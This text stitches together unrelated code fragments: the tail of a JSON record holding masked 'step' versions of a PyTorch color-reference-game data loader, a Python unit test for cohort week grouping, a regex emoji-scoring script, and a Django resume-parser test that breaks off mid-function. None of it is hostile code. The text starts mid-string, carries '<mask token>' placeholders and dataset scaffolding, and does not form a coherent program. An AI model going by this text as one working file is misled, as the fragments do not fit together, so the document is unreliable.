output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-2": "<mask token>\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n 
dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-3": "<mask token>\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], 
dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-4": "from collections import Counter\nimport pandas as pd\nimport string\nfrom collections import namedtuple, defaultdict\nimport csv\nimport sys\nimport torch\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.sparse import coo_matrix\nfrom tqdm import tqdm\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = 
torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-5": "from collections import Counter\nimport pandas as pd\nimport string\nfrom collections import namedtuple, defaultdict\nimport csv\nimport sys\nimport torch\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.sparse import coo_matrix\nfrom tqdm import tqdm\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'\n\ndef get_data():\n df = pd.read_csv(\"./data/filteredCorpus.csv\")\n df_filt = df[df['outcome']==True] # use only successful games\n df_filt = df_filt[df_filt['role']=='speaker'] # use speaker utterances\n df_filt = df_filt[df_filt['source']=='human'] # use speaker utterances\n\n # making a list of utterances that we want to use, so we can take these rows from df_filt\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1] # only use one word utterances\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for u in utt_filt] # remove punctuation\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys()) # use utterances that appear more than once\n\n # df_filt = df_filt[df_filt['numCleanWords'] == 1]\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(str.maketrans('', '', string.punctuation)))# filter to take out punctuation\n df_final = df.loc[df['contents'].isin(utt_final)] # this is the dataset of all the games that we want to use\n\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n\n return df_final, le\n\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors']) # 100 x 100 (test data)\n print(\"length colors and contents\", len(df['colors']), len(df['contents']))\n print(\"set colors and contents\", len(set(df['colors'])), len(set(df['contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents']) # rows are colors, columns are utterances\n # row numbers and column numbers correspond to labels from colors_le and le (utterances) from get_data()\n meaning_mat = np.array(meaning_mat) # a num_color x num_utterances matrix\n\n for i in range(len(meaning_mat[:,0])):\n if sum(meaning_mat[i,:]) == 0:\n print(\"meaning mat is 0 for this row: \", i)\n for j in range(len(meaning_mat[0,:])):\n if meaning_mat[i,j] == 0:\n print(\"meaning mat is 0 at: \", i,j,\" !!!\")\n return meaning_mat, colors_le\n\n\n\n\n# Literal listener data function\n\n\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i,u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)\n colors = (correct, alt1, alt2)\n # idxs = random.choice([0,1,2]) # randomly permute colors\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes\n output.append((correct_idx, colors_shuff, utt))\n 
return output, all_utt, desc_to_idx # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc\n\n # return all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc\n\n\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i,u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)\n colors = (correct, alt1, alt2)\n # idxs = random.choice([0,1,2]) # randomly permute colors\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes\n output.append((correct_idx, colors_shuff, utt))\n return output#, all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc\n\n# Literal Speaker data function - hi r u ok\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32).to(device)\n output.append([color, utt])\n\n return output # [referent, utterance_idx]\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from unittest.case import TestCase
from datetime import datetime
from src.main.domain.Cohort import Cohort
from src.main.domain.Group import Group
from src.main.util.TimeFormatter import TimeFormatter
__author__ = 'continueing'
class CohortTest(TestCase):
def testAnalyzeNewGroups(self):
cohort = Cohort(aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aInterval = 7)
groups = cohort.groups
group = Group(anId=1, aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-11 23:59:59'), aNickname="5월 1째 주")
self.assertEqual(groups[0].period, group.period)
group = Group(anId=2, aStartDate=TimeFormatter.toDatetime('2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-18 23:59:59'), aNickname="5월 2째 주")
self.assertEqual(groups[1].period, group.period)
group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-25 23:59:59'), aNickname="5월 3째 주")
self.assertEqual(groups[2].period, group.period)
group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aNickname="5월 4째 주")
self.assertEqual(groups[3].period, group.period)
self.assertEqual(groups.__len__(),4)
def testSnapshots(self):
        self.fail("should test this, but it takes too long (network time)")
|
normal
|
{
"blob_id": "f12bdfc054e62dc244a95daad9682790c880f20d",
"index": 5367,
"step-1": "<mask token>\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n\n def testSnapshots(self):\n self.fail('should test this! but take too long network time')\n",
"step-3": "<mask token>\n__author__ = 'continueing'\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n\n def testSnapshots(self):\n self.fail('should test this! but take too long network time')\n",
"step-4": "from unittest.case import TestCase\nfrom datetime import datetime\nfrom src.main.domain.Cohort import Cohort\nfrom src.main.domain.Group import Group\nfrom src.main.util.TimeFormatter import TimeFormatter\n__author__ = 'continueing'\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n\n def testSnapshots(self):\n self.fail('should test this! but take too long network time')\n",
"step-5": "from unittest.case import TestCase\nfrom datetime import datetime\nfrom src.main.domain.Cohort import Cohort\nfrom src.main.domain.Group import Group\nfrom src.main.util.TimeFormatter import TimeFormatter\n\n__author__ = 'continueing'\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aInterval = 7)\n groups = cohort.groups\n\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-11 23:59:59'), aNickname=\"5월 1째 주\")\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime('2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-18 23:59:59'), aNickname=\"5월 2째 주\")\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-25 23:59:59'), aNickname=\"5월 3째 주\")\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aNickname=\"5월 4째 주\")\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(),4)\n\n def testSnapshots(self):\n self.fail(\"should test this! but take too long network time\")\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import re
pattern1 = r"[:]{2}[A-Z][a-z]{2,}[:]{2}|[\*]{2}[a-zA-Z]{3,}[\*]{2}"
pattern2 = r"([0-9]+)"
data = input()
valid_emojis = re.findall(pattern1, data)
numbers_ascii = re.findall(pattern2, data)
numbers_total = ""
for num in numbers_ascii:
numbers_total += num
cool_threshold = 1
for i in numbers_total:
i = int(i)
cool_threshold *= i
print(f"Cool threshold: {cool_threshold}")
cool_emoji = []
for j in valid_emojis:
sum_ch = 0
for ch in j:
if ch == "*" or ch == ":":
continue
sum_ch += ord(ch)
if sum_ch > cool_threshold:
cool_emoji.append(j)
print(f"{len(valid_emojis)} emojis found in the text. The cool ones are:")
print(*cool_emoji,sep='\n')
|
normal
|
{
"blob_id": "c2201a281ccd0833b0d7d2219d97ce3175fb012b",
"index": 2042,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor num in numbers_ascii:\n numbers_total += num\n<mask token>\nfor i in numbers_total:\n i = int(i)\n cool_threshold *= i\nprint(f'Cool threshold: {cool_threshold}')\n<mask token>\nfor j in valid_emojis:\n sum_ch = 0\n for ch in j:\n if ch == '*' or ch == ':':\n continue\n sum_ch += ord(ch)\n if sum_ch > cool_threshold:\n cool_emoji.append(j)\nprint(f'{len(valid_emojis)} emojis found in the text. The cool ones are:')\nprint(*cool_emoji, sep='\\n')\n",
"step-3": "<mask token>\npattern1 = '[:]{2}[A-Z][a-z]{2,}[:]{2}|[\\\\*]{2}[a-zA-Z]{3,}[\\\\*]{2}'\npattern2 = '([0-9]+)'\ndata = input()\nvalid_emojis = re.findall(pattern1, data)\nnumbers_ascii = re.findall(pattern2, data)\nnumbers_total = ''\nfor num in numbers_ascii:\n numbers_total += num\ncool_threshold = 1\nfor i in numbers_total:\n i = int(i)\n cool_threshold *= i\nprint(f'Cool threshold: {cool_threshold}')\ncool_emoji = []\nfor j in valid_emojis:\n sum_ch = 0\n for ch in j:\n if ch == '*' or ch == ':':\n continue\n sum_ch += ord(ch)\n if sum_ch > cool_threshold:\n cool_emoji.append(j)\nprint(f'{len(valid_emojis)} emojis found in the text. The cool ones are:')\nprint(*cool_emoji, sep='\\n')\n",
"step-4": "import re\npattern1 = '[:]{2}[A-Z][a-z]{2,}[:]{2}|[\\\\*]{2}[a-zA-Z]{3,}[\\\\*]{2}'\npattern2 = '([0-9]+)'\ndata = input()\nvalid_emojis = re.findall(pattern1, data)\nnumbers_ascii = re.findall(pattern2, data)\nnumbers_total = ''\nfor num in numbers_ascii:\n numbers_total += num\ncool_threshold = 1\nfor i in numbers_total:\n i = int(i)\n cool_threshold *= i\nprint(f'Cool threshold: {cool_threshold}')\ncool_emoji = []\nfor j in valid_emojis:\n sum_ch = 0\n for ch in j:\n if ch == '*' or ch == ':':\n continue\n sum_ch += ord(ch)\n if sum_ch > cool_threshold:\n cool_emoji.append(j)\nprint(f'{len(valid_emojis)} emojis found in the text. The cool ones are:')\nprint(*cool_emoji, sep='\\n')\n",
"step-5": "import re\n\npattern1 = r\"[:]{2}[A-Z][a-z]{2,}[:]{2}|[\\*]{2}[a-zA-Z]{3,}[\\*]{2}\"\npattern2 = r\"([0-9]+)\"\ndata = input()\nvalid_emojis = re.findall(pattern1, data)\nnumbers_ascii = re.findall(pattern2, data)\n\nnumbers_total = \"\"\n\nfor num in numbers_ascii:\n numbers_total += num\n\ncool_threshold = 1\n\nfor i in numbers_total:\n i = int(i)\n cool_threshold *= i\n\n\nprint(f\"Cool threshold: {cool_threshold}\")\n\ncool_emoji = []\n\nfor j in valid_emojis:\n sum_ch = 0\n for ch in j:\n if ch == \"*\" or ch == \":\":\n continue\n sum_ch += ord(ch)\n\n if sum_ch > cool_threshold:\n cool_emoji.append(j)\n\nprint(f\"{len(valid_emojis)} emojis found in the text. The cool ones are:\")\nprint(*cool_emoji,sep='\\n')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase
from collections import Counter
import generator.resume_parser as resume_parser
import os
import json
class TestResumeParser(TestCase):
def load_resume(self, resume_name):
path_to_directory = "generator/fixtures/{resume_name}.pdf".format(resume_name=resume_name)
file_path = os.path.abspath(path_to_directory)
json_string = resume_parser.convert(file_path)
